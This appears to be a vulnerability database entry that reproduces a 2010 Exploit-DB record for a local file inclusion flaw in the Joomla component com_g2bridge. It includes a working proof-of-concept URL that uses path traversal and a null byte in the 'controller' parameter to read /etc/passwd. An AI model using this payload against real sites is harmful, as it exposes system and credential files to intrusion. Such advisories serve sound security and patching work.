Joomla Component com_g2bridge LFI vulnerability

vendor:

com_g2bridge

by:

akatsuchi [Explore Crew]

8,8

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: com_g2bridge

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: CentOS release 4.8 (Final)

2010

Joomla Component com_g2bridge LFI vulnerability

The vulnerability exists in the Joomla component com_g2bridge, which allows an attacker to include arbitrary files from the local system. By sending a specially crafted HTTP request, an attacker can include arbitrary files from the local system.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the component to the latest version.

Source

Exploit-DB raw data:

# Exploit Title: Joomla Component com_g2bridge LFI vulnerability
# Date: May 30th, 2010
# Author: akatsuchi [Explore Crew] hole@hackermail.com
# Platform / Tested on: CentOS release 4.8 (Final)
# category: webaps

=============================================================================================================


[*] Exploit

http://[site]//index.php?option=com_g2bridge&controller=[LFI]


[*] PoC

http://[site]//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../etc/passwd%00


=============================================================================================================


[*] Greetz

ArRay `yuda N4ck0 K4pt3N samu1241 bejamz Gameover antitos yuki pokeng
bjork NoGe c0li jack aJe kaka11 zxvf s4va zreg veter Ijoo
gore gp_davied put_ra Sephi4
Antisecurity Devilzcode evilc0de Mainhack serverisdown IndonesianHacker
Indonesian Coder | ByroeNet | and all can not wrotted


=============================================================================================================


[ It is my place. with all my friends. dgn orang-orang yang bisa menerima gw dan menganggap gw bagian darinya. karena ini adalah dunia kami. kami tidak ingin dibedakan. kita sama ]